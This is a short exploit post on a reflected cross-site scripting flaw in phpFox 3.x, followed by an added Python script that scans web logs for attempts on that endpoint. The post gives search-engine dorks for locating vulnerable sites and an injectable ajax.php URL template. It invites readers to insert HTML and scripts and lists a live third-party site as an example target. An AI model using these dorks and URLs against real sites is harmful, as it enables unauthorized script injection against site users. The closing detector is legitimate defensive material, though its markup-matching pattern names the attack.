phpFox is a PHP script for building social
networking websites, similar to Facebook.
Version 3.1 and some other versions of phpFox are
vulnerable to XSS.
Google Dork:
"intext:© · English (US) Powered By phpFox Version 3.0.1."
"inurl:/static/ajax.php?core"
Open any website from the search results that shows the
text "© · English (US) Powered By phpFox Version 3.0.1"
or has a URL like xyz.com/static/ajax.php?core
You will then get a URL like the one given
below:
http://www.ursite.com/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=&core[security_token]=99d754d2b583565369e194e30eaabcbc
You can use multiple HTML tags and scripts
here. For details, check this post.
Live examples:
http://onlinesocial.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=
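
For defenders, one way to spot attempts against the endpoint described above is to scan web access logs for core.message calls whose message parameter decodes to HTML markup. This is an added example, not code from the original post or from phpFox; the log lines, function names and markup pattern are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Start of an HTML tag, closing tag or comment: <b, </div, <!--
MARKUP = re.compile(r"<[a-zA-Z/!]")
# Request target inside a combined-format access log line
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def message_has_markup(target, extra_decodes=2):
    """True if a core.message call to /static/ajax.php carries markup in `message`."""
    parts = urlsplit(target)
    if not parts.path.endswith("/static/ajax.php"):
        return False
    params = parse_qs(parts.query, keep_blank_values=True)
    if "core.message" not in params.get("core[call]", []):
        return False
    for value in params.get("message", []):
        # parse_qs already decoded once; decode again to catch double encoding
        for _ in range(extra_decodes + 1):
            if MARKUP.search(value):
                return True
            value = unquote(value)
    return False

def flag_lines(lines):
    """Return the log lines whose request matches the pattern above."""
    hits = []
    for line in lines:
        m = REQUEST.search(line)
        if m and message_has_markup(m.group(1)):
            hits.append(line)
    return hits

# Constructed sample log lines (documentation IP ranges, harmless markup)
BASE = "/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300"
SAMPLE_LOG = [
    f'203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET {BASE}&message=Saved HTTP/1.1" 200 512',
    f'198.51.100.7 - - [01/Jan/2024:10:00:05 +0000] "GET {BASE}&message=%3Cb%3Ehi%3C%2Fb%3E HTTP/1.1" 200 530',
    f'198.51.100.7 - - [01/Jan/2024:10:00:09 +0000] "GET {BASE}&message=%253Ci%253Ehi%253C%252Fi%253E HTTP/1.1" 200 530',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /index.php?message=%3Cb%3Ehi HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for hit in flag_lines(SAMPLE_LOG):
        print("suspicious:", hit)
```

A hit only shows that markup was sent to the endpoint; whether it was reflected unescaped depends on the installed phpFox version.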